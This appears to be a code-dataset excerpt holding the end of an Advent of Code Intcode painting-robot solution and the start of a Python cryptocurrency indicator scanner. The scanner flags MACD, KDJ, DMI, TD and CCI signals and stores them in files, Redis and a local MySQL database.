opcode01(self, params):\n res = params[0] + params[1]\n self.write(params[2], res)\n self.ip += 4\n\n def opcode02(self, params):\n res = params[0] * params[1]\n self.write(params[2], res)\n self.ip += 4\n\n def opcode03(self, params):\n if self.tinput_pos == len(self.tinput):\n _logger.debug(\"read, no input available\")\n self._processing = False\n return self.ip\n elif isinstance(self.tinput, list):\n res = self.tinput[self.tinput_pos]\n self.tinput_pos += 1\n else:\n res = self.tinput\n self.write(params[0], res)\n self.ip += 2\n\n def opcode04(self, params):\n self.output.append(params[0])\n self.ip += 2\n\n def opcode05(self, params):\n p1, p2 = params\n if p1 > 0:\n self.ip = p2\n else:\n self.ip += 3\n\n def opcode06(self, params):\n p1, p2 = params\n if p1 == 0:\n self.ip = p2\n else:\n self.ip += 3\n\n def opcode07(self, params):\n p1, p2, pos = params\n res = 1 if p1 < p2 else 0\n self.write(pos, res)\n self.ip += 4\n\n def opcode08(self, params):\n p1, p2, pos = params\n res = 1 if p1 == p2 else 0\n self.write(pos, res)\n self.ip += 4\n\n def opcode09(self, params):\n self.relativebase.append(self.relativebase[-1] + params[0])\n self.ip += 2\n\n def opcode99(self, index):\n self._processing = False\n self.halt = True\n\n def get_mem_sum(self, what):\n m_id = -1\n m_val = 0\n for i, m in self.mem.items():\n s = sum(\n map(\n lambda x: x[what]\n if str(x[what]).isnumeric()\n else len(str(x[what])) > 5,\n m,\n )\n )\n if m_val < s:\n m_val = s\n m_id = i\n return m_id, m_val\n\n def get_mem_stat(self, what):\n stat = {}\n for i, m in self.mem.items():\n s = sum(\n map(\n lambda x: x[what]\n if str(x[what]).isnumeric()\n else len(str(x[what])) > 5,\n m,\n )\n )\n if s == 0:\n continue\n stat[i] = s\n return stat\n\n def statistics(self):\n statdata = {}\n statdata[\"steps\"] = self.steps\n statdata[\"most read\"], statdata[\"most read count\"] = self.get_mem_sum(\"r\")\n statdata[\"most exec\"], statdata[\"most exec count\"] = self.get_mem_sum(\"e\")\n statdata[\"most write\"], 
statdata[\"most write count\"] = self.get_mem_sum(\"w\")\n statdata[\"exec\"] = self.get_mem_stat(\"e\")\n statdata[\"read\"] = self.get_mem_stat(\"r\")\n statdata[\"written\"] = self.get_mem_stat(\"w\")\n return statdata\n\ndef heatmap(data, filename, show=True):\n fig, ax = plt.subplots()\n for d, m in [(\"read\", \".\"), (\"written\", \"o\"), (\"exec\", \"x\")]:\n ax.scatter(*zip(*data[d].items()), alpha=0.5, marker=m, label=d)\n ax.grid()\n ax.legend()\n fig.savefig(filename)\n if show:\n plt.show()\n\n\ndef print_memory_info(p):\n for mi, m in p.mem.items():\n print(f\"{mi:>5}\", end=\" \")\n if len(m) > 1:\n for mn in m:\n if mn[\"e\"] != 0:\n print(\"!\" * 100)\n print(f' v: {mn[\"v\"]} r: {mn[\"r\"]} e: {mn[\"e\"]} w: ')\n for pii, pi in mn[\"w\"].items():\n print(f\" {pii}: {pi}\")\n else:\n print(f\"{m}\")\n\n\ndef print_stats(stat):\n for n, v in stat.items():\n print(f\"{n}: {v}\")\n\n\np = p2()\n\nclass drawbot(object):\n directions = ['u', 'l', 'd', 'r']\n drawdir = ['^', '<', 'v', '>']\n step = [(0,1), (-1,0), (0, -1), (1,0)]\n def __init__(self, x,y, startval, off_x=30, off_y=45):\n self.x = x\n self.y = y\n self.off_x = off_x\n self.off_y = off_y\n self.direction = 'u'\n self.grid = defaultdict(lambda: defaultdict(int))\n self.grid[0][0] = startval\n self.steps = 0\n\n def get_color(self):\n return self.grid[self.y][self.x]\n\n def command(self, color, direction):\n self.grid[self.y][self.x] = color\n if direction == 0:\n self.direction = self.directions[(self.directions.index(self.direction)+1)%4]\n else:\n self.direction = self.directions[(self.directions.index(self.direction)-1)%4]\n\n def move(self):\n x,y = self.step[self.directions.index(self.direction)]\n self.x += x\n self.y -= y\n self.steps += 1\n\n def colored(self):\n return sum(map(len, self.grid.values()))\n\ndef print_grid(self):\n print(chr(27)+'[2j')\n print('\\033c')\n print('\\x1bc')\n cnt = 0\n RANGEX=-30,50\n RANGEY=-10,20\n SLEEP=0.0125\n for y in range(RANGEY[1], RANGEY[0], -1):\n for x in range(RANGEX[0], RANGEX[1], 1):\n if x == self.x and y == self.y:\n print(self.drawdir[self.directions.index(self.direction)], end='')\n continue\n if y not in self.grid or not x in self.grid[y]:\n print(' ', end='')\n continue\n v = self.grid[y][x]\n cnt += 1\n if v == 1:\n print(termcolor.colored('█', 'white'), end = '')\n else:\n print(termcolor.colored('░', 'white'), end = '')\n\n print()\n print(cnt)\n time.sleep(SLEEP)\n\ndef part1():\n r = drawbot(0,0,0)\n p = p2()\n p.set_prog(inp)\n \n fig = plt.figure()\n\n RANGEX=-30,50\n RANGEY=-10,20\n SLEEP=0.0125\n grid = [[-1 for x in range(RANGEY[1], RANGEY[0], -1)] for y in range(RANGEX[0], RANGEX[1], 1)]\n plot =plt.matshow(grid, fignum=0)\n def update(frame):\n p.add_input(r.get_color())\n p.run()\n outp = p.output\n r.command(*outp)\n p.output.clear()\n r.move()\n grid = [[-1 for x in range(RANGEY[1], RANGEY[0], -1)] for y in range(RANGEX[0], RANGEX[1], 1)]\n for y in range(RANGEY[1], RANGEY[0], -1):\n for x in range(RANGEX[0], RANGEX[1], 1):\n if y not in r.grid or not x in r.grid[y]:\n grid[x][y] = -1\n continue\n grid[x][y] = r.grid[y][x]\n grid.append(grid)\n plot.set_data(grid)\n return [plot]\n\n while not p.halt:\n p.add_input(r.get_color())\n p.run()\n outp = p.output\n r.command(*outp)\n p.output.clear()\n r.move()\n grid = [[-1 for x in range(RANGEY[1], RANGEY[0], -1)] for y in range(RANGEX[0], RANGEX[1], 1)]\n for y in range(RANGEY[1], RANGEY[0], -1):\n for x in range(RANGEX[0], RANGEX[1], 1):\n if y not in r.grid or not x in r.grid[y]:\n grid[y][x] 
= -1\n continue\n grid[x][y] = r.grid[y][x]\n plot =plt.matshow(grid)\n anim = FuncAnimation(fig, update, interval = 10, blit=True)\n\n plt.show()\n\n pass\n\ndef part2():\n r = drawbot(0,0,1,0,0)\n p = p2()\n p.set_prog(inp)\n while not p.halt:\n p.add_input(r.get_color())\n p.run()\n outp = p.output\n r.command(*outp)\n p.output.clear()\n r.move()\n pass\n\n\ndef main():\n if aoc.part_one():\n result = part1()\n print(f'Result: {result}')\n\n if aoc.part_two():\n result = part2()\n print(f'Result: {result}')\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"day11/module_mplib.py","file_name":"module_mplib.py","file_ext":"py","file_size_in_byte":11744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"62443086","text":"\"\"\" Runs the default analyzer, which performs two functions...\n1. Output the signal information to the prompt.\n2. Notify users when a threshold is crossed.\n\"\"\"\n\nfrom copy import deepcopy\n\nimport redis\nimport structlog\nfrom ccxt import ExchangeError\nfrom tenacity import RetryError\n\nfrom analysis import StrategyAnalyzer\nfrom outputs import Output\n\nimport numpy as np\nfrom collections import defaultdict\nimport traceback\nimport json\nimport uuid\nimport os\n\nimport sys\n\nimport mysql.connector\nfrom datetime import date\n\nclass Behaviour():\n \"\"\"Default analyzer which gives users basic trading information.\n \"\"\"\n trendColor = {\n \"分立跳空顶背离\":\"red\",\n \"分立跳空底背离\": \"green\",\n \"段内顶背离\": \"red\",\n \"段内底背离\": \"green\",\n \"接近0轴的macd金叉信号\": \"green\",\n \"TD 底部 9位置\": \"green\",\n \"TD 底部 13位置\": \"green\",\n \"TTD 顶部 9位置\": \"red\",\n \"TTD 顶部 13位置\": \"red\",\n \"TD 底部 1位置\": \"green\",\n \"TD 底部 2位置\": \"green\",\n \"MACD 量能上涨异常\": \"green\",\n \"macd金叉信号\": \"green\",\n \"0轴上macd金叉信号\": \"green\",\n \"macd金叉信号 + DMI\": \"green\",\n \"DMI+\": \"green\",\n \"TD+底部2B信号\": \"green\",\n \"底部2B信号\": \"green\",\n \"沾到ema30/ema60\": \"green\",\n \"kdj金叉信号\": \"green\",\n \"cci over 100\": \"green\"\n }\n\n mydb = mysql.connector.connect(\n host=\"127.0.0.1\", # 数据库主机地址\n user=\"root\", # 数据库用户名\n passwd=\"\", # 数据库密码\n database = \"cs\"\n )\n\n def __init__(self, config, exchange_interface, notifier):\n \"\"\"Initializes DefaultBehaviour class.\n\n Args:\n indicator_conf (dict): A dictionary of configuration for this analyzer.\n exchange_interface (ExchangeInterface): Instance of the ExchangeInterface class for\n making exchange queries.\n notifier (Notifier): Instance of the notifier class for informing a user when a\n threshold has been crossed.\n \"\"\"\n self.logger = structlog.get_logger()\n self.indicator_conf = config.indicators\n self.informant_conf = config.informants\n self.crossover_conf = config.crossovers\n self.exchange_interface = exchange_interface\n self.strategy_analyzer = StrategyAnalyzer()\n self.notifier = notifier\n\n self.indicator_dispatcher = self.strategy_analyzer.indicator_dispatcher()\n self.informant_dispatcher = self.strategy_analyzer.informant_dispatcher()\n output_interface = Output()\n self.output = output_interface.dispatcher\n\n\n def run(self, market_pairs, output_mode):\n \"\"\"The analyzer entrypoint\n\n Args:\n market_pairs (list): List of symbol pairs to operate on, if empty get all pairs.\n output_mode (str): Which console output mode to use.\n \"\"\"\n\n self.logger.info(\"Starting default analyzer...\")\n\n if market_pairs:\n self.logger.info(\"Found configured markets: %s\", market_pairs)\n else:\n self.logger.info(\"No configured markets, using 
all available on exchange.\")\n\n if sys.argv[4:] and (sys.argv[4] == '-a'):\n self.logger.info(\"Scan all flag set to true. using all available on exchange.\")\n market_pairs = None\n\n market_data = self.exchange_interface.get_exchange_markets(markets = market_pairs)\n\n self.logger.info(\"Using the following exchange(s): %s\", list(market_data.keys()))\n exchange = list(market_data.keys())[0]\n \n (indicatorTypeCoinMap, new_result) = self._get_indicator_data(market_data, output_mode)\n if sys.argv[5:]:\n if (sys.argv[5] == '_get_indicator_data'):\n return indicatorTypeCoinMap\n elif (sys.argv[5] == '_write_strategic_data'):\n return self._write_strategic_data(market_data, output_mode)\n elif (sys.argv[5] == '_write_strategic_data_redis'):\n self.persistInRedis(indicatorTypeCoinMap, exchange)\n else:\n self._notify_strategies_data(indicatorTypeCoinMap, exchange, new_result)\n\n def truncateFile(self):\n f = open(sys.argv[2],'r+')\n f.truncate()\n f.close()\n\n def isCloseTo(self, start, actual, target):\n if((target-actual) / (actual-start) < 0.05):\n return True;\n\n def _notify_strategies_data(self, indicatorTypeCoinMap, exchange, new_result):\n self.truncateFile()\n f = open(sys.argv[2], 'a')\n #self.persistInRedis(indicatorTypeCoinMap, exchange)\n self.persistInEmailFormat(f, indicatorTypeCoinMap);\n self.notifier.notify_all(new_result)\n\n def persistInRedis(self, indicatorTypeCoinMap, exchange):\n r = redis.Redis();\n candle_period = self.indicator_conf['macd'][0]['candle_period']\n for indicator in indicatorTypeCoinMap:\n for coin in indicatorTypeCoinMap[indicator]:\n candle_periods = r.hget(coin, str.encode(indicator).decode('utf-8'))\n r.hset(coin + \"|\" + exchange, str.encode(indicator).decode('utf-8'),\n candle_period if candle_periods is None else candle_periods.decode('utf-8') + \"|\" + candle_period)\n r.close();\n\n def _write_strategic_data(self, market_data, output_mode):\n (indicatorTypeCoinMap, new_result) = self._get_indicator_data(market_data, output_mode)\n\n #UUID for DB storage later\n # fileId = uuid.uuid4().hex\n\n os.chdir(os.path.dirname(os.path.dirname(os.path.abspath(__file__))) + \"/tmp\")\n fileId = list(market_data)[0] + \"-\" + self.indicator_conf['macd'][0]['candle_period'] + \"-\" + \"_write_strategic_data\"\n with open(fileId, 'w+') as f:\n f.write(json.dumps(indicatorTypeCoinMap, sort_keys=True, ensure_ascii=False))\n f.close()\n return fileId\n\n def _get_indicator_data(self, market_data, output_mode):\n (indicatorTypeCoinMap, new_result) = self._apply_strategies(market_data, output_mode)\n return (indicatorTypeCoinMap, new_result)\n\n def persistInPlainFormat(self, f, indicatorTypeCoinMap) :\n #write everything to the email\n for indicator in indicatorTypeCoinMap:\n f.write(\"
    \" + indicator + \"

    \\n\");\n for coin in indicatorTypeCoinMap[indicator]:\n f.write(\"

    币种/交易对:\" + coin.replace('/','') + \" \" + indicator + '

    \\n' );\n f.close();\n\n def persistInEmailFormat(self, f, indicatorTypeCoinMap) :\n #write everything to the email\n for indicator in indicatorTypeCoinMap:\n f.write(\"

    \" + indicator + \"

    \\n\");\n for coin in indicatorTypeCoinMap[indicator]:\n f.write(\"

    币种/交易对:\" + coin.replace('/','') + \" \" + indicator + '

    \\n' );\n f.close();\n\n def detectCoinPairs(self, market_pair):\n return (market_pair.lower().endswith(\"usdt\") or market_pair.lower().endswith(\"usd\")) \\\n and (self.indicator_conf['macd'][0]['candle_period'] in ['6h','12h', '1d', '3d', '1w']);\n\n def _apply_strategies(self, market_data, output_mode):\n \"\"\"Test the strategies and perform notifications as required\n\n Args:\n market_data (dict): A dictionary containing the market data of the symbols to analyze.\n output_mode (str): Which console output mode to use.\n \"\"\"\n indicatorModes = sys.argv[3]\n indicatorTypeCoinMap = defaultdict(list)\n new_result = dict()\n for exchange in market_data:\n if exchange not in new_result:\n new_result[exchange] = dict()\n\n for market_pair in market_data[exchange]:\n\n if not (self.detectCoinPairs(market_pair)):\n continue;\n\n if market_pair not in new_result[exchange]:\n new_result[exchange][market_pair] = dict()\n\n \"\"\"\n set olhcv data\n a bad implementation: this should be performed concurrently\n \"\"\"\n new_result[exchange][market_pair]['indicators'] = self._get_indicator_results(\n exchange,\n market_pair\n )\n\n new_result[exchange][market_pair]['informants'] = self._get_informant_results(\n exchange,\n market_pair\n )\n\n ################################# Indicator data retrieving and strategy\n try:\n\n ohlcv = new_result[exchange][market_pair]['informants']['ohlcv'][0]['result']\n\n upperband = new_result[exchange][market_pair]['informants']['bollinger_bands'][0]['result']['upperband'] ;\n middleband = new_result[exchange][market_pair]['informants']['bollinger_bands'][0]['result']['middleband'] ;\n lowerband = new_result[exchange][market_pair]['informants']['bollinger_bands'][0]['result']['lowerband'] ;\n opened = ohlcv['open'];\n close = ohlcv['close'] ;\n distance_close_open = close - opened;\n low = ohlcv['low'];\n high = ohlcv['high'] ;\n volume = ohlcv['volume'] ;\n plus_di = new_result[exchange][market_pair]['indicators']['plus_di'][0]['result']['plus_di'] ;\n minus_di = new_result[exchange][market_pair]['indicators']['minus_di'][0]['result']['minus_di'] ;\n plus_dm = new_result[exchange][market_pair]['indicators']['plus_dm'][0]['result']['plus_dm'];\n minus_dm = new_result[exchange][market_pair]['indicators']['minus_dm'][0]['result']['minus_dm'];\n delta_di = plus_di - minus_di\n delta_dm = plus_dm - minus_dm\n macd = new_result[exchange][market_pair]['indicators']['macd'][0]['result']['macd']; #white line\n macd_signal = new_result[exchange][market_pair]['indicators']['macd'][0]['result']['macdsignal']; #yellow line\n delta_macd = new_result[exchange][market_pair]['indicators']['macd'][0]['result']['macdhist']; #macd volume\n\n # rsi = new_result[exchange][market_pair]['indicators']['rsi'][0]['result']['rsi'];\n # stoch_slow_k = new_result[exchange][market_pair]['indicators']['stoch_rsi'][0]['result']['slow_k'];\n # stoch_slow_d = new_result[exchange][market_pair]['indicators']['stoch_rsi'][0]['result']['slow_d'];\n kt = new_result[exchange][market_pair]['indicators']['kdj'][0]['result']['k'];\n dt = new_result[exchange][market_pair]['indicators']['kdj'][0]['result']['d'];\n jt = new_result[exchange][market_pair]['indicators']['kdj'][0]['result']['j'];\n\n #cci\n cci = new_result[exchange][market_pair]['indicators']['cci'][0]['result']['cci'];\n ######################################### ema indicator\n #now contains: ema7IsOverEma65 ema7IsOverEma22 ema7IsOverEma33\n # try:\n # ema7 = new_result[exchange][market_pair]['informants']['ema7'][0]['result']['ema'];\n 
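                    # Note: the ema30/ema60 series fetched just below feed the '沾到ema30/ema60' rule\n                    # further down, which fires when the latest low or close sits within a +/-5% band\n                    # of the latest EMA value on a red candle. A band test of that shape (hypothetical\n                    # helper, not defined in this file):\n                    #   def near_ema(price, ema_val, band=0.05):\n                    #       return (1 - band) * ema_val <= price <= (1 + band) * ema_val\n                    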
# ema22 = new_result[exchange][market_pair]['informants']['ema22'][0]['result']['ema'];\n ema30 = new_result[exchange][market_pair]['informants']['ema30'][0]['result']['ema'];\n ema60 = new_result[exchange][market_pair]['informants']['ema60'][0]['result']['ema'];\n #\n # ema7IsOverEma65 = self.ema7OverEma65(ema7, ema65);\n # ema7IsOverEma22 = self.ema7OverEma22(ema7, ema22);\n # ema7IsOverEma33 = self.ema7OverEma33(ema7, ema33);\n #\n # # candleOverEma\n # if ema33 is not None:\n # candleIsOverEma = self.candleOverEma(opened, close, ema33)\n #\n # except RuntimeError:\n # print('ema data has errors')\n\n ###################################### td indicator\n indicators = new_result[exchange][market_pair]['indicators']\n td9PositiveFlag = False\n td13PositiveFlag = False\n td9NegativeFlag = False\n td13NegativeFlag = False\n td1PositiveFlag = False\n td2PositiveFlag = False\n\n td9PositiveFlag42B = False\n td13PositiveFlag42B = False\n td1PostiveFlag42B = False\n td2PositiveFlag42B = False\n td9NegativeFlag42B = False\n td13NegativeFlag42B = False\n if('td' in indicators):\n td = indicators['td'][0]['result']['td'];\n (td9PositiveFlag, td9NegativeFlag, td13PositiveFlag, td13NegativeFlag, td1PositiveFlag, td2PositiveFlag) = self.tdDeteminator(2, td)\n\n ###################################### 2B indicator\n # This 2B is based on TD bottom point. It pick ups the 2B point near/at TD 9 point.\n # argrelextrema is not very useful due to massive but not distinguished valley points.\n # peakIndex = new_result[exchange][market_pair]['indicators']['peak_loc'][0]['result']['peak_loc']\n # valleyIndex = new_result[exchange][market_pair]['indicators']['valley_loc'][0]['result']['valley_loc']\n\n #- bottom 2B for later use\n (td9PositiveFlag42B, td9NegativeFlag42B, td13PositiveFlag42B, td13NegativeFlag42B, td1PostiveFlag42B, td2PositiveFlag42B) = self.tdDeteminator(3, td)\n\n ########################################## cci\n isCciOver100 = (cci[len(cci) - 1] > 100) and (cci[len(cci) - 2] < 100)\n\n ########################################## goldenMacdFork\n intersectionValueAndMin = [0, 0]\n if not (len(macd) == 0 \\\n or len(macd_signal) == 0 \\\n or len(delta_macd) == 0):\n\n goldenForkMacd = (\n\n (delta_macd[len(delta_macd)-1] >= 0 and delta_macd[len(delta_macd)-2] <= 0) or\n\n (delta_macd[len(delta_macd)-1] >= 0 and delta_macd[len(delta_macd)-2] >= 0 and delta_macd[len(delta_macd)-3] <= 0)\n )\n\n macdVolumeIncreasesSurprisingly = (delta_macd[len(delta_macd) - 1] >= 0) and (\n delta_macd[len(delta_macd) - 2] >= 0) and (delta_macd[len(delta_macd) - 1] >= (\n delta_macd[len(delta_macd) - 2] * 3))\n\n ############################################## deadForkMacd\n # deadForkMacd = (\n # delta_macd[len(delta_macd) - 1] <= 0 and delta_macd[len(delta_macd) - 2] >= 0\n # )\n #\n # macdVolumeMinusIsDecreased = False\n # (macdVolumeMinus,min) = self.lastNMinusMacdVolume(delta_macd[0:len(delta_macd)-1])\n # if( len(macdVolumeMinus) != 0 and self.lastNMinusDecreased(macdVolumeMinus,min) ):\n # macdVolumeMinusIsDecreased = True\n\n ############################################## goldenForkKdj\n len_k = len(kt)\n len_d = len(dt)\n len_j = len(jt)\n goldenForkKdj = (\n ((dt[len_d-2] >= kt[len_k-2]) and (kt[len_k-2] >= jt[len_j-2]))\n and\n ((dt[len_d-1] <= kt[len_k-1]) and (kt[len_k-1] <= jt[len_j-1]))\n )\n\n ############################################# deadForkKdj\n # deadForkKdj = (\n # ((dt[len_d - 2] <= kt[len_k - 2]) and (kt[len_k - 2] <= jt[len_j - 2]))\n # and\n # ((dt[len_d - 1] >= kt[len_k - 1]) and 
(kt[len_k - 1] >= jt[len_j - 1]))\n # )\n\n ############################################# dmi\n lastNDMIIsPositiveVolume = (self.lastNDataIsPositive(delta_di, 3) > 0) or (self.lastNDataIsPositive(delta_di, 2) > 0) or (self.lastNDataIsPositive(delta_di, 1) > 0)\n lastNDIIsPositiveFork = self.lastNDMIIsPositive(delta_di, 2)\n lastNDMIsPositiveFork = self.lastNDMIIsPositive(delta_dm, 2)\n\n ############################################# macdBottomDivergence\n hasBottomDivergence = self.detectBottomDivergence(delta_macd, low, macd_signal)\n hasPeakDivergence = self.detectPeakDivergence(delta_macd, high, macd_signal)\n hasMultipleBottomDivergence = self.detectMultipleBottomDivergence(delta_macd, low, macd_signal)\n hasMultiplePeakDivergnce = self.detectMultiplePeakDivergence(delta_macd, high, macd_signal)\n\n ############################################# bollCross\n # bollCross = False\n # if (len(middleband) != 0):\n # delta_close_middleband = close - middleband;\n # delta_low_middleband = low - middleband;\n # if ((delta_close_middleband.iloc[-1] > 0 and delta_low_middleband.iloc[-1] < 0) or\n # (delta_close_middleband.iloc[-2] > 0 and delta_low_middleband.iloc[-2] < 0)\n # ):\n # bollCross = True\n\n ########################################### rsi < 30\n # rsiIsLessThan30 = (rsi[len(rsi)-1] <= 30)\n\n ########################################### detectMacdVolumeIsShrinked\n # detectMacdVolumeIsShrinked = self.detectMacdVolumeShrinked(delta_macd, self.detectFirstMacdPositiveSlotPosition(delta_macd))\n\n ########################################### stochrsi\n # len_sd = len(stoch_slow_d)\n # len_sk = len(stoch_slow_k)\n # stochrsi_goldenfork = (\n # (stoch_slow_d[len_sd-2] >= stoch_slow_k[len_sk-2])\n # and\n # (stoch_slow_d[len_sd-1] <= stoch_slow_k[len_sk-1])\n # )\n #\n # stochrsi_deadfork = (\n # (stoch_slow_d[len_sd - 2] <= stoch_slow_k[len_sk - 2])\n # and\n # (stoch_slow_d[len_sd - 1] >= stoch_slow_k[len_sk - 1])\n # )\n\n ########################################## volume is 3 times greater than before\n # len_volume = len(volume)\n # volumeIsGreater = volume[len_volume-1] >= 3 * volume[len_volume-2]\n\n ############################################ macd正值平滑\n #c(macd+)>5 + D<0.1\n #counts: 10,\n flatPositive = False\n positiveFlag = self.lastNDataIsPositive(delta_macd, 10);\n if(positiveFlag):\n variance, mean, max = self.getVariance(delta_macd, 10);\n # print(market_pair + \"===\" + str(variance) + \"===\" + str(mean) + \"===\" + str(max))\n flatPositive = self.lastNDataIsPositive(delta_macd, 10) and (variance <= 0.01) and (mean/max <= 0.2)\n\n #narrowedBoll\n #(narrowedBoll, test_arr) = self.lastNBoolIsNarrowed((upperband/lowerband)**10, 5) # counts of narrowed points\n #continuousKRise\n lastNKPositive = self.lastNKIsPositive(distance_close_open)\n\n if(indicatorModes == 'custom'):\n\n # if(self.isOverceedingTriangleLine(peakLoc, ohlcv)):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"上升突破三角形\",\n # indicatorTypeCoinMap)\n\n #if (macdVolumeIncreasesSurprisingly):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"MACD 量能上涨异常\",\n # indicatorTypeCoinMap)\n\n #if (td1PositiveFlag):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"TD 底部 1位置\", indicatorTypeCoinMap)\n\n #if (td2PositiveFlag):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"TD 底部 2位置\", indicatorTypeCoinMap)\n\n if (td9NegativeFlag):\n self.printResult(new_result, exchange, market_pair, output_mode, \"TD 底部 9位置\", indicatorTypeCoinMap)\n 
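                        # Note: toDb() records each signal at most once per rolling 10-day window -- its\n                        # INSERT ... WHERE NOT EXISTS guards on td_name/market_pair/candle_period/exchange,\n                        # so repeated scans do not duplicate rows in the td table.\n                        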
self.toDb(\"TD 底部 9位置\", exchange, market_pair)\n\n if (td13NegativeFlag):\n self.printResult(new_result, exchange, market_pair, output_mode, \"TD 底部 13位置\", indicatorTypeCoinMap)\n self.toDb(\"TD 底部 13位置\", exchange, market_pair)\n\n #if (td9PositiveFlag):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"TTD 顶部 9位置\", indicatorTypeCoinMap)\n\n #if (td13PositiveFlag):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"TTD 顶部 13位置\", indicatorTypeCoinMap)\n\n if(self.isBottom2B(volume, opened, close) and (hasMultipleBottomDivergence or hasBottomDivergence)) :\n self.printResult(new_result, exchange, market_pair, output_mode, \"背离+底部2B信号\", indicatorTypeCoinMap)\n self.toDb(\"背离+底部2B信号\", exchange, market_pair)\n\n if (td13NegativeFlag42B or td9NegativeFlag42B):\n if (self.isBottom2B(volume, opened, close)):\n self.printResult(new_result, exchange, market_pair, output_mode, \"TD+底部2B信号\", indicatorTypeCoinMap)\n self.toDb(\"TD+底部2B信号\", exchange, market_pair)\n\n #if (self.isBottom2B(volume, opened, close)):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"底部2B信号\",\n # indicatorTypeCoinMap)\n\n if (goldenForkMacd and intersectionValueAndMin[0]):\n self.printResult(new_result, exchange, market_pair, output_mode, \"0轴上macd金叉信号\", indicatorTypeCoinMap)\n self.toDb(\"0轴上macd金叉信号\", exchange, market_pair)\n\n if (lastNDIIsPositiveFork or lastNDMIsPositiveFork):\n self.printResult(new_result, exchange, market_pair, output_mode, \"DMI+\", indicatorTypeCoinMap)\n #\n # if (ema7IsOverEma65):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"7日线上穿65日ema线\", indicatorTypeCoinMap)\n #\n # if (ema7IsOverEma22):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"7日线上穿22日ema线\", indicatorTypeCoinMap)\n #\n # if (ema7IsOverEma33):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"7日线上穿33日ema线\", indicatorTypeCoinMap)\n #\n # if (candleIsOverEma):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"k线上穿33日ema线\", indicatorTypeCoinMap)\n\n # if (flatPositive):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"macd正值平滑\", indicatorTypeCoinMap)\n\n (start, end) = self.detectMacdSlots(delta_macd, 0, 'positive')\n if (goldenForkMacd and (intersectionValueAndMin[0] > 0.2 * 2 * delta_macd[\n self.getIndexOfMacdValley(delta_macd, start, end)])):\n self.printResult(new_result, exchange, market_pair, output_mode, \"接近0轴的macd金叉信号\",\n indicatorTypeCoinMap)\n self.toDb(\"接近0轴的macd金叉信号\", exchange, market_pair)\n\n if ((lastNDIIsPositiveFork or lastNDMIsPositiveFork) and goldenForkMacd):\n self.printResult(new_result, exchange, market_pair, output_mode, \"macd金叉信号 + DMI\",\n indicatorTypeCoinMap)\n self.toDb(\"macd金叉信号 + DMI\", exchange, market_pair)\n\n if (\n ((low[len(low)-1] >= (1-0.05) * ema60[len(ema60)-1] and low[len(low)-1] <= (1+0.05) * ema60[len(ema60)-1])\n or (low[len(low)-1] >= (1-0.05) * ema30[len(ema30)-1] and low[len(low)-1] <= (1+0.05) * ema30[len(ema30)-1])\n or (close[len(close) - 1] >= (1 - 0.05) * ema60[len(ema60) - 1] and close[len(close) - 1] <= (\n 1 + 0.05) * ema60[len(ema60) - 1])\n or (close[len(close) - 1] >= (1 - 0.05) * ema30[len(ema30) - 1] and close[len(close) - 1] <= (\n 1 + 0.05) * ema30[len(ema30) - 1])\n )\n and\n (close[len(close)-1] < opened[len(opened)-1])\n\n ):\n self.printResult(new_result, exchange, market_pair, output_mode, \"沾到ema30/ema60\",\n indicatorTypeCoinMap)\n\n # if (goldenForkMacd and 
stochrsi_goldenfork):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"stochrsi强弱指标金叉 + macd金叉信号\", indicatorTypeCoinMap)\n\n # if (macdBottomDivergence and lastNDMIIsPositiveFork):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"macd底背离 + DMI\", indicatorTypeCoinMap)\n\n # if (macdBottomDivergence and stochrsi_goldenfork):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"macd底背离 + stochrsi强弱指标金叉\", indicatorTypeCoinMap)\n\n # if (goldenForkKdj and goldenForkMacd):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"kdj金叉信号 + macd金叉信号\", indicatorTypeCoinMap)\n\n if (goldenForkMacd):\n self.printResult(new_result, exchange, market_pair, output_mode, \"macd金叉信号\", indicatorTypeCoinMap)\n\n if (goldenForkKdj):\n self.printResult(new_result, exchange, market_pair, output_mode, \"kdj金叉信号\", indicatorTypeCoinMap)\n\n # if (goldenForkKdj and lastNDMIIsPositiveFork):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"kdj金叉信号 + DMI\", indicatorTypeCoinMap)\n\n # if (stochrsi_goldenfork and lastNDMIIsPositiveFork):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"stochrsi强弱指标金叉 + DMI\", indicatorTypeCoinMap)\n\n # compound indicator\n if (hasBottomDivergence):\n self.printResult(new_result, exchange, market_pair, output_mode, \"段内底背离\", indicatorTypeCoinMap)\n\n #if (hasPeakDivergence):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"段内顶背离\", indicatorTypeCoinMap)\n\n if (hasMultipleBottomDivergence):\n self.printResult(new_result, exchange, market_pair, output_mode, \"分立跳空底背离\", indicatorTypeCoinMap)\n\n #if (hasMultiplePeakDivergnce):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"分立跳空顶背离\", indicatorTypeCoinMap)\n\n # if (stochrsi_goldenfork and goldenForkKdj and lastNDMIIsPositiveVolume and (delta_macd[len(delta_macd)-1] > delta_macd[len(delta_macd)-2])):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"stochrsi强弱指标金叉 + kdj金叉信号 + DMI+ + macd量能减小\", indicatorTypeCoinMap)\n\n # if (stochrsi_goldenfork and macdIsDecreased):\n # self.printResult(new_result, exchange, market_pair, output_mode, \"stochrsi强弱指标金叉 + macd下跌量能减弱\",\n # indicatorTypeCoinMap)\n\n if (isCciOver100):\n self.printResult(new_result, exchange, market_pair, output_mode, \"cci over 100\", indicatorTypeCoinMap)\n self.toDb(\"cci over 100\", exchange, market_pair)\n######################################################\n except Exception as e:\n print(\"An exception occurred for \" + market_pair + \":\" + exchange)\n print(e)\n 